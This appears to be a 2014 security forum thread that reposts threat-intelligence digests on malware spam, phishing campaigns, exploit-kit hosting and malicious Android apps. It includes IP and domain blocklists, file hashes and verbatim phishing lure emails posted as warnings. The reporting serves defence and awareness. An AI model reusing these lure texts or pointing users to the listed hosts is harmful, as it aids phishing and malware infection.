- Master boot record-related. McAfee Labs found 2.2 million new MBR-attacks in 2013.
The complete report is available here*."
* http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q4-2013.pdf
___

Facebook scam: naked videos of friends - delivers Trojans instead
- https://net-security.org/malware_news.php?id=2728
Mar 10, 2014 - "Bitdefender has discovered that more than 1,000 people have already been tricked into installing Trojan malware after clicking on a new Facebook scam that promises naked videos of their friends. The UK was the second most affected country by number of users and infections were also detected in France, Germany, Italy and Romania.
> http://www.net-security.org/images/articles/bitdefender032014.jpg
The scam, now spreading on the social network, can multiply itself by tagging users’ friends extremely quickly. To avoid detection, cybercriminals vary the scam messages by incorporating the names of Facebook friends alongside “private video,” “naked video” or “XXX private video”... To increase the infection rate, the malware has multiple installation possibilities. Besides the automated and quick drop on the computer or mobile device, it also multiplies itself when users -click- the -fake- Adobe Flash Player update. To make the scam more credible, cybercriminals faked the number of views of the adult video to show that over 2 million users have allegedly clicked on the infected YouTube link..."
___

Malware peddler tryouts: different exploit kits
- https://net-security.org/malware_news.php?id=2729
Mar 10, 2014 - "Websense researchers* have been following several recent -email-spam- campaigns targeting users of popular services such as Skype and Evernote, and believe them to be initiated by the infamous ru:8080 gang, which a history of similar spam runs impersonating legitimate Internet services such as Pinterest, Dropbox, etc. These latest campaigns start with -spoofed- emails purportedly alerting the recipients to a message/image they have received on Skype and Evernote, offering an embedded link that leads to compromised sites hosting an exploit kit. In the past, the aforementioned gang's preferred exploit kit was Blackhole, but with the arrest and prosecution of its creator... they have switched first to using the Magnitude, then the Angler and, finally, the Goon exploit kit. This group is currently focusing more on UK users, but targets US and German users as well... This gang typically pushes information-stealing trojans such as Cridex, Zeus GameOver, and click-fraud trojans like ZeroAccess onto the users, but they have also been known to deliver ransomware and worms. In this last few cases, the delivered malware is a Zeus variant that was initially detected by just a handful of commercial AV solutions..."
* http://community.websense.com/blogs/securitylabs/archive/2014/02/19/cyber-criminals-ramp-up-use-of-angler-and-goon-exploit-kits.aspx
___

Fake gateway .gov .uk SPAM
- http://blog.dynamoo.com/2014/03/gatewayconfirmationgatewaygovuk-spam.html
10 Mar 2014 - "This -fake- spam from the UK Government Gateway comes with a malicious payload:
Date: Mon, 10 Mar 2014 12:04:21 +0100 [07:04:21 EDT]
From: gateway.confirmation@ gateway .gov .uk
Subject: Your Online Submission for Reference 485/GB3283519 Could not process
Priority: High
The submission for reference 485/GB3283519 was successfully received and was not
processed.
Check attached copy for more information.
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.

Attached is a file GB3283519.zip which in turn contains a malicious executable GB10032014.pdf.scr which has an icon that makes it look like a PDF file. This has a VirusTotal detection rate of 7/50*. Automated analysis tools... show attempted downloads from i-softinc .com on 192.206.6.82 (MegaVelocity, Canada) and icamschat .com on 69.64.39.215 (Hosting Solutions International, US). I would recommend that you -block- traffic to the following IPs and domains:
192.206.6.82
i-softinc .com
icamschat .com "
* https://www.virustotal.com/en-gb/file/f7773b7d9fcc3f98b2680d145c6b9e6e4b5c4832a1d6e9f5da96b3692865eb97/analysis/1394462821/
___

MS Account 'Outlook Web Access' Phish ...
- http://www.hoax-slayer.com/outlook-web-access-phishing-scam.shtml
Mar 10, 2014 - "Email purporting to be from the Microsoft Account Team claims that recipients must click a link to upgrade their email account and set up Outlook Web Access. The email is -not- from Microsoft and the claim that users must click a link to upgrade their email accounts is a lie. The message is a phishing scam designed to trick users into sending their Microsoft account login details to criminals.
Example:
> http://www.hoax-slayer.com/images/microsoft-account-phishing-scam-2014-1.jpg
... the email is -not- from Microsoft and the claim that users must follow a link to upgrade their email account is untrue. Instead, the email is a criminal ruse designed to trick people into giving their Microsoft account details to cybercriminals. Those who fall for the trick and click one of the links as instructed will be taken to a -bogus- 'Microsoft' website that displays the following login form:
> http://www.hoax-slayer.com/images/microsoft-account-phishing-scam-2014-2.jpg
Once they have added their email address and password, victims will then be presented with a message claiming that their 'Outlook account was updated successfully'. Within a few seconds, they will be redirected to a genuine Microsoft website. Meanwhile, the criminals responsible for the phishing campaign can use the stolen credentials to hijack the real Microsoft accounts belonging to their victims. A 'Microsoft account' is the new name for what was previously known as a 'Windows Live ID.' The one set of login details can be used to access a number of Microsoft services, and are thus a valuable target for scammers..."

:mad: :fear:

AplusWebMaster
2014-03-12, 13:44
FYI...

DDoS attack - WordPress pingback abuse...
- http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
Mar 10, 2014 - "Distributed Denial of Service (DDOS) attacks are becoming a common trend on our blog lately, and that’s OK because it’s a very serious issue for every website owner... Any WordPress site with Pingback enabled (which is on by default) can be used in DDOS attacks against other sites. This is a well known issue within WordPress and the core team is aware of it, it’s not something that will be patched though. In many cases this same issue is categorized as a feature, one that many plugins use..."
* http://it-beta.slashdot.org/story/14/03/11/2324207/large-ddos-attack-brings-wordpress-pingback-abuse-back-into-spotlight
Mar 12, 2014

- http://arstechnica.com/security/2014/03/more-than-162000-legit-wordpress-sites-abused-in-powerful-ddos-attack/
Mar 11 2014
___

Malware found in Google Play Store
- http://blog.malwarebytes.org/mobile-2/2014/03/malware-found-in-google-play-store/
Mar 12, 2014 - "Most experts agree the best way to stay safe from Android malware is to stick to trusted sources–specifically the Play Store. Unfortunately, those sources can sometimes be compromised. In the last week there have been -two- malware families found in Google’s Play Store... The first one, found by Lookout Security*, is a remote administration tool called Dendroid.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/dendriod02.jpg
This particular malware is a variant of the publicly available remote tool AndroRAT. Dendroid was advertised as “Parental Control” in the Play Store... This Play Store version of Dendroid was discovered only a couple of days after Dendroid was uncovered from the underworld by Symantec**, which means Google was -unaware- of the malicious code at the time... The second app was uncovered by Avast*** and is a SMS -Trojan- disguised as a night vision app.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/fakecam01.jpg
The Trojan is capable of looking up contact numbers in a social messaging apps like WhatsApp, Telegram, and ChatON. Once the number is collected it’s sent to a remote server and the numbers are used to register for a premium service costing up to $50... Both of these apps have been removed from the Play Store... Android malware continues to increase and at times they’re able to sneak into places we trust..."
* https://blog.lookout.com/blog/2014/03/06/dendroid/

** http://www.symantec.com/connect/blogs/android-rats-branch-out-dendroid

*** http://blog.avast.com/2014/03/07/google-play-whats-the-newest-threat-on-the-official-android-market/
___

Twitter crashes... again
- http://www.reuters.com/article/2014/03/11/us-twitter-outage-idUSBREA2A1NY20140311
Mar 11, 2014 - "Twitter Inc crashed on Tuesday for the second time in nine days when a software glitch stalled the popular messaging service for about one hour. The company apologized to its 250 million users in a status blog, saying it had encountered "unexpected complications" during "a planned deploy in one of our core services." The outage began around 11 a.m. Pacific time and service had "fully recovered" by 11:47 a.m., the San Francisco-based company said..."
___

Beware Bitcoin: U.S. brokerage regulator
- http://www.reuters.com/article/2014/03/11/us-bitcoin-finra-idUSBREA2A1OJ20140311
Mar 11, 2014 - "Bitcoin can expose people to significant losses, fraud and theft, and the lure of a potential quick profit should not blind investors to the virtual currency's significant risks, a brokerage industry watchdog warned on Tuesday. In an investor alert* titled "Bitcoin: More than a Bit Risky,"* the Financial Industry Regulatory Authority (FINRA) said recent events such as the bankruptcy of Bitcoin exchange operator Mt. Gox have spotlighted some of the currency's risks..."
* http://www.finra.org/Newsroom/NewsReleases/2014/P457519

:fear: :sad:

AplusWebMaster
2014-03-13, 12:42
FYI...

Exploit Kits - OVH Canada / r5x .org / Penziatki
- http://blog.dynamoo.com/2014/03/evil-network-ovh-canada-r5xorg-penziatki.html
13 Mar 2014 - "Hat tip to Frank Denis (@jedisct1)* for this report** on Nuclear EK's hosted by OVH Canada using their infamous "Penziatki" customer which is linked to black-hat host r5x .org***. The blocks have been identified as belonging to that customer and I would recommend that you block them:
198.27.114.16/30
198.27.114.64/27
198.50.186.232/30
198.50.186.236/30
198.50.186.252/30
198.50.231.204/30
OVH Canada have repeatedly hosted exploit kits for this customer... If you are in a security-sensitive environment then you might simply want to block traffic to the following ranges:
198.27.0.0/16
198.50.0.0/16
Of course this will block many legitimate sites, but if stopping exploit kits is a priority over some user inconvenience then you may want to consider it. If you want a slightly more nuanced blocklist then these ranges contain the biggest concentration of malware:
198.27.114.0/24
198.50.172.0/24
198.50.186.0/24
198.50.197.0/24
198.50.231.0/24 ..."
(More detail at the dynamoo URL above.)

* https://twitter.com/jedisct1

** https://gist.github.com/jedisct1/9509527 - Nuclear Exploit Kit Mar 12

*** http://blog.dynamoo.com/search/label/R5X.org

> http://google.com/safebrowsing/diagnostic?site=AS:16276
___

Malware sites to block 13/3/14
- http://blog.dynamoo.com/2014/03/malware-sites-to-block-13313.html
13 Mar 2014 - "These IPs and domains seem to be involved in injection attacks today. I recommend you block them.
64.120.242.178
188.226.132.70
93.189.46.90 ...
The domains being abused are as follows.. many of them appear to be hijacked legitimate domains..."
(Many others listed at the dynamoo URL above.)
___

Fake Blood count result - fake PDF malware
- http://myonlinesecurity.co.uk/important-complete-blood-count-result-fake-pdf-malware/
13 Mar 2014 - "This email saying IMPORTANT Complete blood count result pretending to come from NICE (National Institute for Health and Care Excellence) has to be the most vicious and evil attempt by any malware purveyor to try to infect a victim. Sending an email saying that you probably have cancer will alarm & distress so many people and is just the most offensive and disgusting attempt to trick a user into opening a malware attachment... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Other subjects in this evil email attempt to infect you are:
- IMPORTANT:Blood analysis result
- IMPORTANT:Blood analysis
- IMPORTANT:Complete blood count (CBC)result ...
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/IMPORTANT-Complete-blood-count-CBCresult.png
... 13 March 2014: CBC_Result_9B4824B65E.zip (55kb) Extracts to CBC_scaned_584444449.pdf.exe
Current Virus total detections: 2/50*... careful when unzipping them and make sure you have “show known file extensions enabled"**, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/d666d6e927caa1b5b8fcef5891d8ec8afc7c9984e02307e4ee7c3ee411c73218/analysis/1394703905/

** http://myonlinesecurity.co.uk/why-you-should-set-your-folder-options-to-show-known-file-types/
___

Key Secured Message -fake- PDF malware
- http://myonlinesecurity.co.uk/key-secured-message-fake-pdf-malware/
13 March 2014 - "Key Secured Message pretending to come from Payroll Reports <payroll @quickbooks .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Key-Secured-Message.png
... Extracts to NIKON-2013564-JPEG.scr ... Current Virus total detections: 2/50*
This Key Secured Message is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en-gb/file/0bfe5d4d5f2079666292f3aa7e7f2d4a7eaf76b0a1fdb7cb4c2e881c606855c2/analysis/
___

Fake Sky .com "Statement of account" SPAM
- http://blog.dynamoo.com/2014/03/skycom-statement-of-account-spam.html
13 Mar 2014 - "This -fake- Sky .com email comes with a malicious attachment:
Date: Thu, 13 Mar 2014 12:23:09 +0100 [07:23:09 EDT]
From: "Sky .com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for the December invoice as this is now due for
payment.
Regards, Carmela ...
Wilson McKendrick LLP Solicitors ...

Attached is an archive Statement.zip which in turn contains a malicious executable Statement.scr which has a VirusTotal detection rate of 6/50*. Automated analysis tools... show attempted connections to the following domains and IPs:
188.247.130.190 (Prime Telecom SRL, Romania)
gobemall .com
gobehost .info
184.154.11.228 (Singlehop, US)
terenceteo .com
184.154.11.233 (Singlehop, US)
quarkspark .org
The two Singlehop IPs appear to belong to Host The Name (hostthename .com) which perhaps indicates a problem at that reseller.
Recommended blocklist:
184.154.11.228
184.154.11.233
188.247.130.190
gobemall .com
gobehost .info
terenceteo .com
quarkspark .org "
* https://www.virustotal.com/en-gb/file/809154e0402366e7dfb272ea1620cc4a7b1d03ea0c6880835d394d117608fda9/analysis/1394715270/
___

HM Revenue & Customs Spam
- http://threattrack.tumblr.com/post/79368114782/hm-revenue-customs-spam
Mar 12, 2014 - "Subjects Seen:
HMRC Tax Notice
Typical e-mail details:
Dear <email address>
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 6807706.

Malicious File Name and MD5:
PDF_Scanned_HMRCBBD45F6647.zip (09BA8CF32FDDE3F73EA8F2E6F75BDF1E)
scaned_7246582_pdf_4364534533.exe (3F347C85BEA303904975FF0A8DE49E7E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/71620291d779248364387873deffee64/tumblr_inline_n2c0ewlGe41r6pupn.png

Tagged: HMRC, weelsof

:mad: :fear:

AplusWebMaster
2014-03-14, 14:24
FYI...

Google Docs users Targeted - Phishing Scam
- http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam
13 Mar 2014 - "We see -millions- of phishing messages every day, but recently, one stood out: a sophisticated scam targeting Google Docs and Google Drive users. The scam uses a simple subject of "Documents" and urges the recipient to view an important document on Google Docs by clicking on the included link. Of course, the link doesn't go to Google Docs, but it does go to Google, where a very convincing fake Google Docs login page is shown:
Google Docs phishing login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/phish_site_image.png
The -fake- page is actually hosted on Google's servers and is served over SSL, making the page even more convincing. The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive's preview feature to get a publicly-accessible URL to include in their messages. This login page will look familiar to many Google users, as it's used across Google's services. (The text below "One account. All of Google." mentions what service is being accessed, but this is a subtlety that many will not notice.) It's quite common to be prompted with a login page like this when accessing a Google Docs link, and many people may enter their credentials without a second thought. After pressing "Sign in", the user’s credentials are sent to a PHP script on a -compromised- web server. This page then redirects to a real Google Docs document, making the whole attack very convincing. Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content..."
___

ABSA Global business - certificate update – fake PDF malware
- http://myonlinesecurity.co.uk/absa-global-business-customers-certificate-update-fake-pdf-malware/
Mar 14, 2014 - "ABSA Global business customers 'certificate update' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. ABSA Global is a South African Bank so I wouldn’t expect a high number of US or UK citizens to have accounts with them, so this should be a quite obvious scam, phishing, malware attack to the majority of users. After examination of the malware, although many Antiviruses detect it as a Zbot, It looks more like an Androm version, possibly dropped by Asprox botnet. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
Attention!
On March 14, 2014 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to install new server certificate attached to the letter.
Thank you in advance for your attention to this matter and sorry for possible inconveniences.
System Administrator ABSA Global

cert p12 install instruction.zip (58kb) - Extracts to ABSA cert p12 install instruction.exe
Current Virus total detections: 11/50* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f50ead6088bacbb78c3b63188e91ec504916b22f19106110cd28cac22e265843/analysis/
___

Fake Facebook messages
- http://myonlinesecurity.co.uk/fake-facebook-messages/
Mar 14, 2014 - "... plagued by Fake Facebook messages saying ” somebody commented on your status” (1) or “You requested a new Facebook password” (2) ...
1) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/facebook-somebody-commented-on-your-status.png
2) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/facebook-You-requested-a-new-Facebook-password.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Facebook. Do not click on the links, just delete the emails as soon as they arrive. Thee is always the very high possibility that one of the other botnets will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines that could kill you."
___

Banks to be hit with MS costs for running outdated ATMs
- http://www.reuters.com/article/2014/03/14/banks-atms-idUSL6N0M345C20140314
LONDON/NEW YORK, March 14, 2014 - "Banks around the world, consumed with meeting more stringent capital regulations, will miss a deadline to upgrade outdated software for automated teller machines (ATMs) and face additional costs to Microsoft to keep them secure. The U.S. software company first warned that it was planning to end support for Windows XP in 2007, but only one-third of the world's 2.2 million ATMs which use the system will have been upgraded to a new platform, such as Windows 7 by the April deadline, according to NCR, one of the biggest ATM makers. To ensure the machines are protected against viruses and hackers many banks have agreed deals with Microsoft to continue supporting their ATMs until they are upgraded, extra costs and negotiations that were avoidable but are now likely to be a distraction for bank executives... Britain's five biggest banks - Lloyds Banking Group , Royal Bank of Scotland, HSBC, Barclays and Santander UK - either have, or are in the process of negotiating, extended support contracts with Microsoft. The cost of extending support and upgrading to a new platform for each of Britain's main banks would be in the region of 50 to 60 million pounds ($100 million), according to Sridhar Athreya, London-based head of financial services advisory at technology firm SunGard Consulting, an estimate corroborated by a source at one of the banks. Athreya said banks have left it late to upgrade systems after being overwhelmed by new regulatory demands in the wake of the 2007-08 financial crisis... Windows XP currently supports around 95 percent of the world's ATMs... many of the banks operating them will still be running their ATMs with Windows XP for a while after the April 8 deadline..."
___

Bogus online casino themed campaigns intercepted in the wild
- http://www.webroot.com/blog/2014/03/14/spamvertised-bogus-online-casino-themed-emails-lead-w32casino/
Mar 14, 2014 - "... proliferation of social engineering driven, privacy-violating campaigns serving W32/Casino variants. Relying on affiliate based revenue sharing schemes and spamvertised campaigns as the primary distribution vectors, the rogue operators behind them continue tricking tens of thousands of gullible users into installing the malicious applications. We’ve recently intercepted a series of spamvertised campaigns distributing W32/Casino variants...
Sample screenshots of the landing pages for the rogue casinos:
1) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA.png
2) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_01.png
3) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_02.png
4) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_03.png
5) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_04.png
6) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_05-1024x576.png
Spamvertised URLs:
hxxp ://bit. ly/1brCoxg
hxxp ://bit .ly/1bQRudq
hxxp ://bit .ly/1mLQr5I
hxxp ://bit .ly/MCOyaL
hxxp ://bit .ly/1ec3UMN
hxxp ://bit .ly/1hN6Vbd
hxxp ://bit .ly/1mQ3XFu
hxxp ://bit .ly/17DJ4pZ
hxxp ://bit .ly/1ec2JNa
hxxp ://bit .ly/1fBY6d5
W32.Casino PUA domains reconnaisance:
hxxp ://rubyfortune .com – 78.24.211.177
hxxp ://grandparkerpromo .com – 95.215.61.160
hxxp ://kingneptunescasino1 .com – 67.211.111.169
hxxp ://riverbelle1 .com – 193.169.206.233
hxxp ://europacasino .com – 87.252.217.13
hxxp ://vegaspartnerlounge .com – 66.212.242.136

Sample detection rates for the W32/Casino PUA:
MD5: b80db6ec0e6c968499ce01232fbfdc5c * ... W32/Casino.P.gen!Eldorado
MD5: a2a545adf4498e409f7971f326333333 ** ... Heuristic.BehavesLike.Win32.Suspicious-DTR.S
MD5: a2a545adf4498e409f7971f326333333 *** ... W32/Casino.P.gen!Eldorado
MD5: 1cd6db7edbbc07d1c68968f584c0ac82 **** ... W32/Casino.P.gen!Eldorado
... (More) Known to have been downloaded from the same IP (87.248.203.254) ..."
* https://www.virustotal.com/en/file/135caecdb6399309e682c50a6555b2399caddbc15d586eb3e6daaa46aa946290/analysis/1394642298/
** https://www.virustotal.com/en/file/48a6ca872752c457b4844cbcf11e0bab80f0fee84d37659c1a70c8025c32e503/analysis/1394642439/
*** https://www.virustotal.com/en/file/353a47127596e06e3424d7dcb81ae5eeed83e492b3c911b82a47b7899ee0ea88/analysis/1394643637/
**** https://www.virustotal.com/en/file/4cfa780d93d15d05b38544c4db3f2a9284b2dd29fd06675729775e3717032c42/analysis/1394643413/

:mad: :fear: :sad:

AplusWebMaster
2014-03-17, 13:19
FYI...

Something evil on 198.50.140.64/27
- http://blog.dynamoo.com/2014/03/something-evil-on-198501406427.html
17 Mar 2014 - "Thanks again to Frank Denis (@jedisct1) for this heads up* involving grubby web host OVH Canada and their black hat customer "r5x .org / Penziatki" hosting the Nuclear EK in 198.50.140.64/27. A full list of all the web sites I can find associated with this range can be found here**, but the simplest thing to do is block 198.50.140.64/27 completely (or if you are paranoid about security and don't mind some collateral damage block 198.27.0.0/16 and 198.50.0.0/16). Domains in use that I can identify are listed below. I recommend you block -all- of them. Domains listed as malicious by Google are in red, those listed as suspect by SURBL are in italics.
Recommended blocklist:
198.50.140.64/27
ingsat .eu
kingro .biz ..."
(More detail and domains listed at the dynamoo URL above.)
* https://twitter.com/jedisct1/status/445220289534631937

** http://pastebin.com/kkPRKu6v
___

Something evil on 192.95.6.196/30
- http://blog.dynamoo.com/2014/03/something-evil-on-19295619630.html
17 Mar 2014 - "Another useful tip by Frank Denis* on evil in the OVH Canada IP ranges, suballocated to their black hat customer "r5x .org / Penziatki", this time on 192.95.6.196/30. The following domains should be considered as dangerous and I would recommend blocking them as soon as possible:
shoalfault .ru
addrela .eu
backinl .org
A full list of the domains I can find in this /30 can be found here** [pastebin].
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
* https://twitter.com/jedisct1/status/445690516433145856

** http://pastebin.com/RWG8uj00
___

Bank of America / Merrill Lynch - Completion of request for ACH CashPro – fake PDF malware
- http://myonlinesecurity.co.uk/bank-america-merrill-lynch-completion-request-ach-cashpro-fake-pdf-malware/
Mar 17, 2014 - "Bank of America Merrill Lynch Completion of request for ACH CashPro is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Bank-of-America-Merrill-Lynch-Completion-of-request-for-ACH-CashPro.png
17 March 2014 securedoc.zip (12kb) Extracts to securedoc.exe
Current Virus total detections: 2/49* - MALWR Auto Analysis**
This Bank of America Merrill Lynch Completion of request for ACH CashPro is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/4ceb14accb1937ebdaab550823495618deebce69a33b23c849656ce71ceb9bf5/analysis/

** https://malwr.com/analysis/Njc2MjY3YzcyNTc0NDA5NThlYjdhODVhYTEyMzI4OTY/
___

Injection attack in progress 17/3/14
- http://blog.dynamoo.com/2014/03/injection-attack-in-progress-17314.html
17 Mar 2014 - "A couple of injection attacks seem to be in progress, I haven't quite got to the bottom of them yet.. but you might want to block the following domains:
fsv-hoopte-winsen .de
grupocbi .com
These are hosted on 82.165.77.21 and 72.47.228.162 respectively. The malware is resistant to automated tools and redirects improperly-formed attempt to analyse it to Bing [1] [2]. The malware is appended to hacked .js files on target sites... This sort of attack has been used to push -fake- software updates* in the past. Even though I can't quite get to the bottom of this at the moment, you can be pretty sure that this is Nothing Good and I would recommend blocking these domains."
1) http://urlquery.net/report.php?id=9933756

2) http://urlquery.net/report.php?id=9933677

* http://blog.dynamoo.com/2014/01/script-exploits-lead-to-adscend-media.html
___

Fake Personal message from Gmail Service – spam
- http://myonlinesecurity.co.uk/fake-personal-message-gmail-service-spam/
Mar 17, 2014 - "< your name> Personal message from Gmail Service is an alternative version of the Fake Facebook messages*. Just like the Facebook versions these either take you to a Women’s Health page trying to sell you fake drugs for slimming or other women’s problems. Other days they send you to one of the Canadian or Russian Pharmacy pages selling Viagra, valium or other illegal drugs.
Fake Personal message from Gmail Service
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/fake-gmail-message.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Gmail. Do -not- click on the links, just delete the emails as soon as they arrive. There is always the very high possibility that one of the other -botnets- will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines..."
* http://myonlinesecurity.co.uk/fake-facebook-messages/
___

Fake Salesforce/Quickbooks invoice - malware
- http://blog.dynamoo.com/2014/03/salesforcecom-please-respond-overdue.html
Mar 17, 2014 - "This -fake- Salesforce spam comes with a malicious attachment... actually two malicious attachments..
Date: Mon, 17 Mar 2014 16:12:20 +0100 [11:12:20 EDT]
From: "support @ salesforce .com" [support @ salesforce .com]
Subject: Please respond - overdue payment
Priority: High Priority 2
Please find attached your invoices for the past months. Remit the payment by 01/9/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Alvaro Rocha
This e-mail has been sent from an automated system...

Attached are two archive files quickbook_invoice_89853654.rar and quickbook_invoice_8988561346654.zip which in turn contain the same malicious executable quickbook_invoice.scr which has a VirusTotal detection rate of 8/49*. Automated analysis tools... don't give much of a clue as to what is going on..."
* https://www.virustotal.com/en-gb/file/cc44b6e1388610fe84794c064e9b73bedf3450bfa08ea328ecd08cec30001d12/analysis/1395087978/

:fear: :mad:

AplusWebMaster
2014-03-18, 15:18
FYI...

AMEX phish...
- http://myonlinesecurity.co.uk/american-express-phishing-attempts/
Mar 18, 2014 - "We are seeing quite a few American Express -phishing- attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. They are using literally hundreds if not thousands of -hijacked- websites to perform these attacks. The site listed in the email is the first step in the chain and you are bounced on to other sites. The coding on the primary hijacked sites suggest that they are under the control of the Blackhole and Angler exploit kit criminals. This means that at any time when they have taken stolen enough identities and money, they will switch to spreading malware via the same network and emails. Do not click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t American Express. Immediately -delete- the email and the safest way to make sure that it isn’t a genuine email form American Express is to type the American Express web address in your browser. and then log in to the account that way. There are currently 2 main avenues of the American Express phishing attempts:
AmericanExpress phishing attempts:
1) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/American-Express-Irregular-card-activity-phishing-email.png
2) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/American-Express-Important-Personal-Security-Key-phishing-email.png
Following the link in these takes you to a website that looks exactly like the real American Express site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace ( if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___

Gov't Biz Dept. – fake PDF malware
- http://myonlinesecurity.co.uk/government-business-departament-fake-pdf-malware/
Mar 18, 2014 - "Government Business Departament pretending to come (from a) Department for Business Innovation & Skills <business_dep@ gov .uk> from is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Please note the poor -spelling- in the email subject, which should be enough of a flag to warn users of the -fake- . Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Government-Business-Departament.png
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

Fake YouTube email – fake mov malware
- http://myonlinesecurity.co.uk/received-youtube-video-fake-mov-malware/
Mar 18, 2014 - "'You have received a YouTube video' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details... plain simple email with subject You have received a YouTube video and content just says 'Sent from my iPad'...
18 March 2014 : VIDEO_819562694.MOV.ZIP (79kb) : Extracts to VIDEO_890589685.MOV.exe
Current Virus total detections: 6/50*
... another one of the spoofed icon files... will look like a proper mov ( movie) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/50516df13d5974a31c1499ea3d37f3bc17ab84ab808d91a44cc80e8666b769ae/analysis/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/959ff3eff26773774443079d5d9d150f/tumblr_inline_n2mznrfywx1r6pupn.png
___

